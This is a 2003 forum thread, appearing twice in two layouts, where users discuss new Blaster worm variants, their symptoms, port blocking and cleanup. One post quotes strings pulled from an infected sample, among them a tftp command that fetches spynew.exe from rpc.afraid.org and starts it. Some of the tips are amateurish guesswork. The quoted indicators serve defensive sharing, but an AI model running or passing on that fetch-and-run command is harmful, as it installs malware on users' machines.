Blaster worm - new versions - GoFuckYourself.com

dj pussy · 08-13-2003, 11:08 PM

original worm:
http://www.symantec.com/avcenter/ven...ster.worm.html

new viesion b:
http://www.symantec.com/avcenter/ven...er.b.worm.html

new viesion c:
http://www.symantec.com/avcenter/ven...er.c.worm.html

ONS · 08-14-2003, 05:39 AM

I got hit 40mins ago simply renamed the 2 exe files to txt so it would not be able to restart and i ran the XP system restore all fixed.

IMP^or^SNiTL.e · 08-14-2003, 05:40 AM

how do u get hit though, where does it most commonly go? msn... icq.....kazaa?

ONS · 08-14-2003, 05:53 AM

You can block with router or firewall.

TCP Port 135, "DCOM RPC"
UDP Port 69, "TFTP"

Its using a hole in windows to get direct access they just run up the IP chain from various sources infecting users at random. Soon as it got me my Router lit up like a christmas tree and i noticed 2 new exe files on my c:\ drive. If you just disconnect network from taskbar you kill the connection and then you can restore your system with no problems.

I even saved copies of the install for my collection.

jeroman · 08-14-2003, 05:55 AM

Quote:

Originally posted by IMP^or^SNiTL.e
how do u get hit though, where does it most commonly go? msn... icq.....kazaa?

It's spreading in the network and looks for IP's close to
the IP it's on and goes to those IPs machines and the it continues..

Nothing ot do with ICQ, mail or whatever - that's the cool thing

AdultNex · 08-14-2003, 06:38 AM

Quote:

Originally posted by jeroman

It's spreading in the network and looks for IP's close to
the IP it's on and goes to those IPs machines and the it continues..

Nothing ot do with ICQ, mail or whatever - that's the cool thing

In Layman's terms, it can travel through a normal connection. Meaning, while surfing around some websites, you could be hit without knowing it.

ONS · 08-14-2003, 08:01 AM

Nah you will know when it gets you because it starts sending packets to mircosoft to try and overload their servers. I did not get anything with the name Msblast.exe or by any of the names from the other 2 versions so this is something different. It cannot be removed by simply killing the process so the symantec removal instructions might not be of much use.

Also if you reboot while infected its not going to let you on the net and will shut you off every few mins. So if you do get hit then you better fix your system or restore before you reboot or you will regret it when your connection is overloaded. Its got a calling card inside thats needed to hijack to your system and appears to only affect english windows versions.

You should block ports 130-140 from inbound connections just to be on the safe side unless you run services on any of those ports.

If you are infected you might find some of these files below on your machine. You will also find ctrl-alt-del (task manager) will close everytime you open it to prevent you from killing the process.

c:\Documents and Settings\All Users\Start Menu\Programs\Startup\spynew.exe
c:\rootdir.exe
c:\wincgi32.exe

dink dink
%s Exploitable!
%s 135 open
start spynew.exe
tftp -i rpc.afraid.org GET spynew.exe
cd "\Documents and Settings\All Users\Start Menu\Programs\Startup\"

It looks for the following OS below and possibly wont affect non english builds.

Windows XP SP1 (english)
Windows XP SP0 (english)
Windows 2000 SP4 (english)
Windows 2000 SP3 (english)
Windows 2000 SP2 (english)
Windows 2000 SP1 (english)
Windows 2000 SP0 (english)

raceman · 08-14-2003, 08:47 AM

I was getting bombared with hackers, its my belief that my IP was displayed on a hacking site somewhere. It was getting so annoying that in th end I looked at all the files on the PC with a recent date stamp and deleted them "tee hee hee" after that i reinstall Norton and ramped it up to full security, since then the fuckers have been knocked back. As soon as my current ADSL contract is up I'm going "dynamic"

08-13-2003, 11:08 PM	#1
dj pussy Confirmed User Join Date: Jul 2003 Location: google Posts: 1,440	Blaster worm - new versions original worm: http://www.symantec.com/avcenter/ven...ster.worm.html new viesion b: http://www.symantec.com/avcenter/ven...er.b.worm.html new viesion c: http://www.symantec.com/avcenter/ven...er.c.worm.html

08-14-2003, 05:39 AM	#2
ONS Registered User Join Date: Jan 2001 Location: Sparta Posts: 204	I got hit 40mins ago simply renamed the 2 exe files to txt so it would not be able to restart and i ran the XP system restore all fixed.

08-14-2003, 05:40 AM	#3
IMP^or^SNiTL.e A/S/L .. I don't names. Industry Role: Join Date: Aug 2003 Posts: 1,177	how do u get hit though, where does it most commonly go? msn... icq.....kazaa?

08-14-2003, 05:53 AM	#4
ONS Registered User Join Date: Jan 2001 Location: Sparta Posts: 204	You can block with router or firewall. TCP Port 135, "DCOM RPC" UDP Port 69, "TFTP" Its using a hole in windows to get direct access they just run up the IP chain from various sources infecting users at random. Soon as it got me my Router lit up like a christmas tree and i noticed 2 new exe files on my c:\ drive. If you just disconnect network from taskbar you kill the connection and then you can restore your system with no problems. I even saved copies of the install for my collection.

08-14-2003, 08:01 AM	#7
ONS Registered User Join Date: Jan 2001 Location: Sparta Posts: 204	Nah you will know when it gets you because it starts sending packets to mircosoft to try and overload their servers. I did not get anything with the name Msblast.exe or by any of the names from the other 2 versions so this is something different. It cannot be removed by simply killing the process so the symantec removal instructions might not be of much use. Also if you reboot while infected its not going to let you on the net and will shut you off every few mins. So if you do get hit then you better fix your system or restore before you reboot or you will regret it when your connection is overloaded. Its got a calling card inside thats needed to hijack to your system and appears to only affect english windows versions. You should block ports 130-140 from inbound connections just to be on the safe side unless you run services on any of those ports. If you are infected you might find some of these files below on your machine. You will also find ctrl-alt-del (task manager) will close everytime you open it to prevent you from killing the process. c:\Documents and Settings\All Users\Start Menu\Programs\Startup\spynew.exe c:\rootdir.exe c:\wincgi32.exe dink dink %s Exploitable! %s 135 open start spynew.exe tftp -i rpc.afraid.org GET spynew.exe cd "\Documents and Settings\All Users\Start Menu\Programs\Startup\" It looks for the following OS below and possibly wont affect non english builds. Windows XP SP1 (english) Windows XP SP0 (english) Windows 2000 SP4 (english) Windows 2000 SP3 (english) Windows 2000 SP2 (english) Windows 2000 SP1 (english) Windows 2000 SP0 (english)

08-14-2003, 08:47 AM	#8
raceman Confirmed User Join Date: Jul 2003 Location: Now offshore on an island paying a heluva lot less tax than you suckers Posts: 1,064	I was getting bombared with hackers, its my belief that my IP was displayed on a hacking site somewhere. It was getting so annoying that in th end I looked at all the files on the PC with a recent date stamp and deleted them "tee hee hee" after that i reinstall Norton and ramped it up to full security, since then the fuckers have been knocked back. As soon as my current ADSL contract is up I'm going "dynamic"